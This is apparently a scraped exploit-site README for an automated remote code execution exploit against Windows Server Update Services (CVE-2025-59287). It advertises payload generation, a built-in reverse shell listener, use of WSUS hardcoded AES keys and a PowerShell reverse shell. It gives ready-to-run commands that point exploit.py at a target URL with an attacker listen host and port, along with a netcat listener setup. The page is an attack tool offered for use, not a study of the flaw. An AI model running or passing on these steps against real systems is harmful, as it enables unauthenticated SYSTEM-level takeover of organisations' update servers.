Share
## https://sploitus.com/exploit?id=E14C74AD-797A-5892-AB6E-B834E94DE383
# CVE-2025-59287 WSUS RCE Exploit
Automated exploit for Windows Server Update Services (WSUS) unauthenticated remote code execution vulnerability.
## Vulnerability Details
- **CVE ID:** CVE-2025-59287
- **CVSS Score:** 9.8 (Critical)
- **Attack Vector:** Network
- **Authentication:** None required
- **Impact:** Remote Code Execution as SYSTEM
## Features
โ
Fully automated payload generation
โ
Auto-downloads ysoserial.NET dependency
โ
Built-in reverse shell listener
โ
Cross-platform support (Windows/Linux/Mac)
โ
AES encryption with WSUS hardcoded keys
โ
PowerShell reverse shell payload
## Requirements
pip install -r requirements.txt
### Python Dependencies
### .NET Runtime (Auto-detected)
- **Windows:** .NET Framework (built-in)
- **Linux/Mac:** Wine or Mono
Ubuntu/Debian
sudo apt install wine-stable
sudo apt install mono-complete
## Installation
Clone or download exploit files
cd CVE-2025-59287-exploit
Install Python dependencies
pip3 install -r requirements.txt
Run exploit (auto-downloads ysoserial.NET)
python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444
text
## Usage
### Basic Exploitation
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
### if want session on another listener
Terminal 1: Start netcat listener
nc -lvnp 4444
Terminal 2: Run exploit without built-in listener
python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener